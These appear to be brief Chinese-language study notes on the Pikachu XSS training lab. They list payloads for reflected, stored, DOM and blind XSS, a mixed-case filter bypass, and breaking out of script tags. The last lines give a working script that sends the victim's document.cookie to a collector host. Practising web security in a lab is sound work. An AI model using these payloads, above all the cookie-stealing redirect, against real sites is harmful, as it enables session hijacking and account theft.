XSS
反射型get
审查元素修改maxlength,payload:<script>alert("a");</script>
post
登陆后payload:<script>alert("a");</script>
利用bp
存储型
payload:<script>alert(document.cookie);</script>
DOM型
伪协议payload:javascript:alert(/a/)
盲打:将信息提交到后台
/pikachu/vul/xss/xssblind/admin_login.php页面登录后弹框
过滤:测试过滤
过滤了<script
过滤了</script
大小写绕过
payload:<scRipt>alert("a");</ScriPt>
成功弹出
htmlspecialchars:默认把预定义的字符 “<” (小于)和 “>” (大于)转换为 HTML 实体
利用JavaScript伪协议
href输出:伪协议
js输出:输入被动态的生成到了javascript中
先闭合<script>
标签
payload:</script><script>alert("a");</script>
XSS后台:
获取cookie
将获得的cookie发至后台
<script>document.location = 'http://192.168.238.131/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>